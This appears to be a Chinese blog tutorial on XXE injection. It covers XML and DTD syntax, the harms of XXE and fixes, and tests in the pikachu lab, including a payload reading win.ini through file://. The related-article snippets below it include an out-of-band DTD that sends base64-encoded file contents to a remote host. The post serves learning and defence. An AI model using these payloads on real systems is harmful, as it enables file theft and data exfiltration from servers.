XXE(XML外部实体注入)学习

最新推荐文章于 2025-11-27 15:41:30 发布
原创 最新推荐文章于 2025-11-27 15:41:30 发布 · 525 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#XXE

XML外部实体注入(XXE)是一种安全漏洞,允许攻击者通过注入恶意XML实体来读取服务器上的文件、执行命令或进行内网扫描。XXE通常发生在服务端未对用户提交的XML数据进行有效验证时。危害包括文件泄露、命令执行等。修复措施包括禁用外部实体加载和过滤XML输入。在实际测试中,可以通过输入特定XML结构来触发漏洞,如读取本地文件。

XXE漏洞

XML外部实体注入(XML External Entity),简称 XXE 漏洞。

XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

XML 文档结构包括 XML 声明、DTD文档类型定义、文档元素。

DTD (Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束。

攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。

即服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

一段常见的 XML 语法结构:
在这里插入图片描述
看起来有点像 HTML 语言,不过 XML 是用来传输和存储数据,HTML 是用来显示数据。

文档类型定义可以是内部声明也可以用外部 DTD。

内部声明 DTD 格式:<!DOCTYPE 根元素 [元素声明]>
引用外部 DTD 格式:<!DOCTYPE 根元素 SYSTEM "文件名">
内部声明实体格式:<!ENTITY 实体名称 "实体的值">
引用外部实体格式:<!ENTITY 实体名称 SYSTEM "URI">

在 DTD 中进行实体声明时,将使用 ENTITY 关键字来声明。
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
还有其他的一些关键字:

DOCTYPE (DTD 的声明)
SYSTEM 、PUBLIC (外部资源申请)

——
——

XXE漏洞的危害

文件读取
命令执行
内网端口扫描
攻击内网网站
发起 dos 攻击
……

——
——

XXE漏洞的修复

禁止使用外部实体,例如 libxml_disable_entity_loader(true) 。
过滤用户提交的 XML 数据,防止出现非法内容。

——
——

下面通过 pikachu 靶场对 XXE 漏洞进行简单的测试

XXE漏洞测试

打开界面,可以看到一个输入窗口,如果随便输入的话,会回显错误。
在这里插入图片描述

先尝试输入:

<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY b  "text"> ]>
<name>&b;</name>

&b; 是用来将 b 这个实体进行调用,可以以看到 b 实体的内容 “text”成功在前端回显。( b 这个的名称是可以更改的)
在这里插入图片描述
再尝试用file协议读取本地文件 win.ini :

<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY b  SYSTEM "file:///C:/Windows/win.ini"> ]>
<name>&b;</name>

可以看到,成功回显文件里的内容。
在这里插入图片描述

web渗透--25--XXE外部实体注入
武天旭的博客
09-16 1621
1、漏洞描述: XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念。实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容。如果在这个过程中引入了“污染”源,在对XML文档处理后则可能导致...
XML外部实体注入(XXE)
web1的博客
09-08 633
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
xml外部实体注入XXE
songbai220
12-10 416
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
XXE漏洞
最新发布
yy200685的博客
11-27 589
XXEXML外部实体注入)是一种利用XML解析器漏洞的攻击方式,通过构造恶意XML文档引用外部实体,可能导致任意文件读取、命令执行等安全风险。本文介绍了XXE的攻击原理,阐述了XML基础语法和DTD(文档类型定义)规范,重点分析了实体引用机制。其中,DTD定义了XML文档结构,包含元素、属性、实体等构建模块,实体可分为内部/外部实体和参数实体。外部实体引用是XXE攻击的关键,当解析器未严格过滤时,攻击者可利用SYSTEM标识符注入恶意代码。文章通过示例说明了实体声明与引用方法,为理解XXE漏洞提供了技术基
XML 外部实体注入---XXE
Hi~ 土拨鼠
12-29 720
文章目录XML介绍及用途XML语法规则XML元素介绍XML DTD介绍DTD 声明类型DTD 数据类型DTD 实体介绍XML 注入XXE)产生的原理简单的XXE 漏洞代码编写file_get_contents()函数php封装协议---php://inputsimplexml_load_string()函数XML 注入回显 输出函数XXE 漏洞利用任意文件读取 XML介绍及用途 XML 被设计用来传输和存储数据。XML文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"XML 允许创作者定义自己
XXE--XML外部实体注入
Y22Lee的博客
04-20 423
简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
XXE(外部实体注入)详解
2401_82576671的博客
01-23 2966
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
「 典型安全漏洞系列 」05.XML外部实体注入XXE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 2443
标记:指计算机能理解的信息符号(标签),通过这些标签,计算机之间可以处理包含各种信息的HTML、文章等;可扩展性:使用者可以根据需要自行定义标签。下面是一个包含XML声明、文档类型定义(Document Type Definition,DTD)的XML文件样例。
网络安全-XXEXML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入
2401_84266286的博客
05-04 859
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
xxe-xml外部实体注入
nigo134的博客
07-27 3238
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
网络安全-XXEXML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入(1)
2401_84544752的博客
05-14 556
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
[Web漏洞原理解析]XXE——XML实体注入
slismy的博客
01-23 362
白话Web漏洞 Author:Bell0ne_ XXE-实体注入一、XML是什么?二、使用步骤1.引入库2.读入数据总结 一、XML是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warni
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 2225
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 3402
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
XXE-实体注入学习
weixin_46865273的博客
05-16 424
1、什么是XXE 定义:XXE =XML实体注入 用户输入的数据当作XML代码注入 2、什么是XMLxml是一种标记语言,和html很像的标记语言 xml是用来传输数据的 xml标签是没有被预定义(任何的标签没有任何的意义) XMl是一种纯文本,仅仅是存文本,他不会做任何事情 XML可以自己发明标签 定义:就是存储数据的 XML的结构 1、声明部分 2、DTD部分 (定义变量的部分,可以从外部获取数据然后定义实体变量) = 既然能够从外部获取数据那么我们就可以发起请求,可以操作协议 和SSRF相似 和S
【每天学习一点新知识】XXEXML外部实体注入)从入门到放弃
RexHa的博客
10-29 2341
XML 指可扩展标记语言(EXtensibleMarkupLanguage)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML——XML介绍和基本语法_KLeonard的博客-优快云博客_xml本文介绍了XML语言的历史,以及它的作用和常见的应用。重点介绍了XML文件的语法规则。
XXE 实体注入
guishengyx的博客
04-27 349
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
XXE--外部实体注入
qq_68233961的博客
10-12 407
XXE--XML外部实体注入
XXE外部实体注入
mlws1900的博客
07-06 225
sql结构化查询语言html超文本标记语言xml可扩展的标记语言报错原因:1.xml有且只能有一个根节点2.标签需要成对出现,否则下面就要加正斜杠3.标签不规则嵌套4.属性的值一定要加上单引号或者双引号 实体引用 XML元素,例如 foo 。如果xml元素内部出现如< 的特殊字符,解析就会失败,为了避免这种情况,XML用实体引用(entity reference)替换特殊字符。XML预定义五个实体引用,即用< > & ' " 替换 < > & ' ".........
XML外部实体注入XXE)漏洞详解
当引用本地系统文件(使用SYSTEM标识)时,XML解析器会尝试访问指定的本地路径,这可能导致安全问题,因为攻击者可能利用这一点注入恶意的外部实体引用,从而读取服务器上的敏感文件。如果引用的是公共DTD(使用...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值